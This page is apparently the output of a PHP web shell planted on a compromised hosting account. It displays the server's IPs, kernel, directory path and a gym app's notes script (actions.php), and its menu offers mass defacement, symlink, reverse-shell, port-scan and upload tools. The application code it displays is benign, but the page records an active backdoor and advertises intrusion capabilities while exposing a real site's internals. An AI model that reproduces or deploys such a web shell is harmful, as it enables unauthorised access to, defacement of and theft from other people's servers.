Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
progressgym
/
modules
/
notas
/
Viewing: actions.php
<?php /** * Módulo Notas - Acciones AJAX * CRUD completo de notas */ require_once __DIR__ . '/../../config/database.php'; header('Content-Type: application/json'); $db = getDB(); $uid = $_SESSION['user_id'] ?? 0; $method = $_SERVER['REQUEST_METHOD']; if (!$uid) { echo json_encode(['success' => false, 'error' => 'No autenticado']); exit; } try { switch ($method) { case 'POST': $data = json_decode(file_get_contents('php://input'), true); if (empty($data['titulo'])) { echo json_encode(['success' => false, 'error' => 'El título es requerido']); exit; } $titulo = trim($data['titulo']); $contenido = trim($data['contenido'] ?? ''); $fecha = $data['fecha'] ?? date('Y-m-d'); if (!empty($data['id'])) { // Actualizar $stmt = $db->prepare("UPDATE notas SET titulo = :titulo, contenido = :contenido, fecha = :fecha WHERE id = :id AND usuario_id = :uid"); $stmt->execute([ ':titulo' => $titulo, ':contenido' => $contenido, ':fecha' => $fecha, ':id' => $data['id'], ':uid' => $uid ]); echo json_encode(['success' => true, 'message' => 'Nota actualizada']); } else { // Crear $stmt = $db->prepare("INSERT INTO notas (usuario_id, titulo, contenido, fecha, duo_id) VALUES (:uid, :titulo, :contenido, :fecha, :duo)"); $stmt->execute([ ':uid' => $uid, ':titulo' => $titulo, ':contenido' => $contenido, ':fecha' => $fecha, ':duo' => getDuoId() ]); echo json_encode(['success' => true, 'message' => 'Nota creada', 'id' => $db->lastInsertId()]); } break; case 'DELETE': $data = json_decode(file_get_contents('php://input'), true); if (empty($data['id'])) { echo json_encode(['success' => false, 'error' => 'ID requerido']); exit; } $stmt = $db->prepare("DELETE FROM notas WHERE id = :id AND usuario_id = :uid"); $stmt->execute([':id' => $data['id'], ':uid' => $uid]); echo json_encode(['success' => true, 'message' => 'Nota eliminada']); break; default: echo json_encode(['success' => false, 'error' => 'Método no permitido']); } } catch (Exception $e) { echo json_encode(['success' => false, 'error' => $e->getMessage()]); }
Coded With 💗 by
0x6ick